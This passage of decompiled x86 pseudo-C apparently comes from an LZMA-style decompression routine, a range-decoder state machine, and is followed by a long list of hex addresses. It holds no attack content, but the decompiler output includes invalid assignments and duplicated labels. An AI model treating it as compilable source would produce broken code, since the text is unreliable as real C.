                                                                                                                                                                                                                            													__ebx = _t217;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L60;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L58;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 0x10:
                                                                                                                                                                                                                            												L109:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t365 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t365;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												goto L111;
                                                                                                                                                                                                                            											case 0x11:
                                                                                                                                                                                                                            												L68:
                                                                                                                                                                                                                            												_t614 =  *(_t621 - 0x58);
                                                                                                                                                                                                                            												 *(_t621 - 0x84) = 0x12;
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L132:
                                                                                                                                                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                                            													goto L133;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 0x12:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            													 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                                                            													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														L132:
                                                                                                                                                                                                                            														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                                                                            														goto L133;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            												__eflags = __eax;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                                                            												goto L130;
                                                                                                                                                                                                                            											case 0x13:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            													_t469 = __ebp - 0x58;
                                                                                                                                                                                                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                                                            													__eflags =  *_t469;
                                                                                                                                                                                                                            													 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                                                            													 *(__ebp - 0x40) = 8;
                                                                                                                                                                                                                            													L144:
                                                                                                                                                                                                                            													 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                                                            													goto L145;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                                                            												 *(__ebp - 0x30) = 8;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                                                            												L130:
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 3;
                                                                                                                                                                                                                            												goto L144;
                                                                                                                                                                                                                            											case 0x14:
                                                                                                                                                                                                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x80);
                                                                                                                                                                                                                            												 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                                                            												goto L1;
                                                                                                                                                                                                                            											case 0x15:
                                                                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                                                            												__al = __al & 0x000000fd;
                                                                                                                                                                                                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                                                            												goto L120;
                                                                                                                                                                                                                            											case 0x16:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            												__eflags = __eax - 4;
                                                                                                                                                                                                                            												if(__eax >= 4) {
                                                                                                                                                                                                                            													_push(3);
                                                                                                                                                                                                                            													_pop(__eax);
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = 6;
                                                                                                                                                                                                                            												__eax = __eax << 7;
                                                                                                                                                                                                                            												 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                                                            												 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            												goto L145;
                                                                                                                                                                                                                            											case 0x17:
                                                                                                                                                                                                                            												L145:
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                                                            												goto L149;
                                                                                                                                                                                                                            											case 0x18:
                                                                                                                                                                                                                            												L146:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												_t484 = __ebp - 0x70;
                                                                                                                                                                                                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                                                            												__eflags =  *_t484;
                                                                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            												L148:
                                                                                                                                                                                                                            												_t487 = __ebp - 0x48;
                                                                                                                                                                                                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            												__eflags =  *_t487;
                                                                                                                                                                                                                            												L149:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            												if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                                                            													__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                                                            													0 = 1;
                                                                                                                                                                                                                            													__eax = 1 << __cl;
                                                                                                                                                                                                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													while(1) {
                                                                                                                                                                                                                            														 *(_t621 - 0x88) = _t542;
                                                                                                                                                                                                                            														goto L1;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            												__esi = __edx + __eax;
                                                                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                                                                            												__edi = __ax & 0x0000ffff;
                                                                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                                                                            													__eax = __eax - __ecx;
                                                                                                                                                                                                                            													__edx = __edx + 1;
                                                                                                                                                                                                                            													__eflags = __edx;
                                                                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                                                                            													 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                                                            													0x800 = 0x800 - __edi;
                                                                                                                                                                                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            													goto L148;
                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                            													goto L146;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            											case 0x19:
                                                                                                                                                                                                                            												__eflags = __ebx - 4;
                                                                                                                                                                                                                            												if(__ebx < 4) {
                                                                                                                                                                                                                            													 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                                                            													L119:
                                                                                                                                                                                                                            													_t393 = __ebp - 0x2c;
                                                                                                                                                                                                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                                                            													__eflags =  *_t393;
                                                                                                                                                                                                                            													L120:
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            													if(__eax == 0) {
                                                                                                                                                                                                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                                                            														goto L170;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                                                            													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                                                            														goto L171;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x30);
                                                                                                                                                                                                                            													_t400 = __ebp - 0x60;
                                                                                                                                                                                                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                                                            													__eflags =  *_t400;
                                                                                                                                                                                                                            													goto L123;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx = __ebx;
                                                                                                                                                                                                                            												__eax = __ebx;
                                                                                                                                                                                                                            												__ecx = __ebx >> 1;
                                                                                                                                                                                                                            												__eax = __ebx & 0x00000001;
                                                                                                                                                                                                                            												__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                                                            												__al = __al | 0x00000002;
                                                                                                                                                                                                                            												__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                                                            												__eflags = __ebx - 0xe;
                                                                                                                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            												if(__ebx >= 0xe) {
                                                                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                                                                            													 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                                                            													L102:
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                                                            													if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                                                            														__eax = __eax + __ebx;
                                                                                                                                                                                                                            														 *(__ebp - 0x40) = 4;
                                                                                                                                                                                                                            														 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                                                            														__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            														__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            														L108:
                                                                                                                                                                                                                            														__ebx = 0;
                                                                                                                                                                                                                            														 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                                                            														 *(__ebp - 0x50) = 1;
                                                                                                                                                                                                                            														 *(__ebp - 0x44) = 0;
                                                                                                                                                                                                                            														 *(__ebp - 0x48) = 0;
                                                                                                                                                                                                                            														L112:
                                                                                                                                                                                                                            														__eax =  *(__ebp - 0x40);
                                                                                                                                                                                                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                                                            															_t391 = __ebp - 0x2c;
                                                                                                                                                                                                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                                                            															__eflags =  *_t391;
                                                                                                                                                                                                                            															goto L119;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														__eax =  *(__ebp - 0x50);
                                                                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                                                            														__eax =  *(__ebp - 0x58);
                                                                                                                                                                                                                            														__esi = __edi + __eax;
                                                                                                                                                                                                                            														 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                                                            														__ax =  *__esi;
                                                                                                                                                                                                                            														__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            														if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                                                            															__ecx = 0;
                                                                                                                                                                                                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                                                            															__ecx = 1;
                                                                                                                                                                                                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                                                            															__ebx = 1;
                                                                                                                                                                                                                            															__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                                                            															__ebx = 1 << __cl;
                                                                                                                                                                                                                            															__ecx = 1 << __cl;
                                                                                                                                                                                                                            															__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                                                            															__cx = __ax;
                                                                                                                                                                                                                            															__cx = __ax >> 5;
                                                                                                                                                                                                                            															__eax = __eax - __ecx;
                                                                                                                                                                                                                            															__edi = __edi + 1;
                                                                                                                                                                                                                            															__eflags = __edi;
                                                                                                                                                                                                                            															 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            															 *__esi = __ax;
                                                                                                                                                                                                                            															 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                            															 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                                                            															0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                                                            															 *__esi = __dx;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            															L111:
                                                                                                                                                                                                                            															_t368 = __ebp - 0x48;
                                                                                                                                                                                                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                                                            															__eflags =  *_t368;
                                                                                                                                                                                                                            															goto L112;
                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                            															goto L109;
                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                                                            														__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                                                            														__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            														__eflags = __ebx;
                                                                                                                                                                                                                            														 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            														L101:
                                                                                                                                                                                                                            														_t338 = __ebp - 0x48;
                                                                                                                                                                                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                                                            														__eflags =  *_t338;
                                                                                                                                                                                                                            														goto L102;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														goto L99;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 4);
                                                                                                                                                                                                                            												__eax = __eax - __ebx;
                                                                                                                                                                                                                            												 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                                                            												goto L108;
                                                                                                                                                                                                                            											case 0x1a:
                                                                                                                                                                                                                            												L56:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												__al =  *(__ebp - 0x5c);
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                                                                                            												__ecx =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                                                                                            												__eax = __ecx + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t192;
                                                                                                                                                                                                                            												goto L79;
                                                                                                                                                                                                                            											case 0x1b:
                                                                                                                                                                                                                            												L75:
                                                                                                                                                                                                                            												__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            												if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            													 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            													goto L170;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            												__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            												 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            												 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                                                                            												_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            												__edx = _t274;
                                                                                                                                                                                                                            												__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            												_t283 = __ebp - 0x64;
                                                                                                                                                                                                                            												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            												__eflags =  *_t283;
                                                                                                                                                                                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            												L79:
                                                                                                                                                                                                                            												 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            												goto L80;
                                                                                                                                                                                                                            											case 0x1c:
                                                                                                                                                                                                                            												while(1) {
                                                                                                                                                                                                                            													L123:
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                                                            													if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            														break;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            													__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            													__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            													 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            													 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            													__eax = __eax + 1;
                                                                                                                                                                                                                            													__edx = 0;
                                                                                                                                                                                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            													__edx = _t414;
                                                                                                                                                                                                                            													__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                                                            													__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            													 *(__ebp - 0x14) = _t414;
                                                                                                                                                                                                                            													if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                                                            														continue;
                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                            														L80:
                                                                                                                                                                                                                            														 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            														goto L1;
                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                            												 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                                                            												goto L170;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									L171:
                                                                                                                                                                                                                            									_t544 = _t543 | 0xffffffff;
                                                                                                                                                                                                                            									goto L172;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c62
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c70
                                                                                                                                                                                                                            0x00406c78
                                                                                                                                                                                                                            0x00406c7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406ca2
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d37
